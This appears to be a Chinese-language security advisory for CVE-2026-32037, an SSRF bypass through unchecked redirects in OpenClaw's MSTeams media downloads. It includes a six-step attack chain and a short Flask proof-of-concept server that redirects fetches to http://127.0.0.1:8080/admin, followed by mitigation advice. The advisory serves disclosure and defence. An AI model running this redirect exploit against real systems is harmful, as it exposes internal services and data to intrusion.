CVE-2026-32037 OpenClaw媒体下载重定向SSRF绕过漏洞

漏洞信息

漏洞编号

CVE-2026-32037

漏洞类型

SSRF (服务端请求伪造)

CVSS评分

6.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.22之前的版本在处理MSTeams媒体下载过程中，未能针对配置的媒体主机白名单（mediaAllowHosts）一致地验证重定向链。攻击者可利用此漏洞提供或恶意构造附件URL，诱导系统强制重定向至非白名单目标。该缺陷导致SSRF（服务端请求伪造）边界控制机制被绕过，攻击者可能借此访问内网资源或敏感服务，造成数据泄露或内部网络被探测的风险。

技术细节

该漏洞源于OpenClaw在处理MSTeams媒体附件下载时的URL重定向验证逻辑存在缺陷。尽管系统配置了`mediaAllowHosts`白名单以限制下载源，但程序在实现上未能对HTTP重定向链中的每一跳进行一致性校验。具体而言，当攻击者提供一个指向白名单内域名的初始URL（例如攻击者控制的恶意服务器）时，OpenClaw仅验证了初始URL的合法性。该恶意服务器随后返回301或302重定向响应，将目标指向内网地址（如http://127.0.0.1/admin）或云元数据服务。由于OpenClaw未对重定向后的最终目标地址进行二次白名单匹配，客户端会自动跟随重定向向非白名单目标发起请求。这种逻辑漏洞使得攻击者能够绕过SSRF防护，利用受害服务器的网络身份扫描内网端口、读取本地敏感文件或攻击内部基础设施。

攻击链分析

STEP 1

侦察

攻击者识别出目标环境使用了存在漏洞的OpenClaw版本（< 2026.2.22），并确认其启用了MSTeams媒体下载功能。

STEP 2

准备

攻击者搭建一个恶意Web服务器，该服务器配置为对特定路径的请求返回302重定向响应，指向内网敏感资源（如127.0.0.1或内网管理后台）。

STEP 3

投递

攻击者通过MSTeams向OpenClaw处理节点发送一条消息，其中包含附件URL，该URL指向攻击者搭建的恶意服务器地址。

STEP 4

执行

OpenClaw接收到消息并尝试下载附件。它验证初始URL（可能通过校验或因逻辑缺陷被绕过），并向恶意服务器发起请求。

STEP 5

利用

恶意服务器返回重定向响应。OpenClaw未检查重定向目标是否在mediaAllowHosts白名单内，直接跟随重定向请求内网目标。

STEP 6

达成

攻击者成功利用OpenClaw服务器的身份访问内网资源，实现SSRF攻击，获取敏感信息或进一步渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC for CVE-2026-32037
# Attacker-controlled server that redirects to internal target

from flask import Flask, redirect, request

app = Flask(__name__)

# The internal target the attacker wants to reach (e.g., internal admin panel)
TARGET_INTERNAL_URL = "http://127.0.0.1:8080/admin"

@app.route('/malicious_media')
def exploit_redirect():
    """
    OpenClaw will request this URL because 'attacker.com' might be trusted
    or logic fails to check the redirect destination.
    """
    print(f"Received request from: {request.remote_addr}")
    print(f"Redirecting to internal target: {TARGET_INTERNAL_URL}")
    # Force a redirect to the non-allowlisted internal target
    return redirect(TARGET_INTERNAL_URL, code=302)

if __name__ == '__main__':
    # Run the malicious server
    app.run(host='0.0.0.0', port=80)

# Usage:
# 1. Attacker hosts this script.
# 2. Attacker sends a MSTeams message with an attachment URL pointing to:
#    http://attacker-server-ip/malicious_media
# 3. Vulnerable OpenClaw instance fetches the URL, follows the 302 redirect,
#    and accesses http://127.0.0.1:8080/admin.

影响范围

OpenClaw < 2026.2.22

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用OpenClaw的MSTeams媒体下载功能。此外，应在防火墙或网关层面对OpenClaw服务器的出站流量进行严格限制，阻断其访问内网IP段（如127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）及非业务必要的外部连接，以减轻SSRF攻击带来的影响。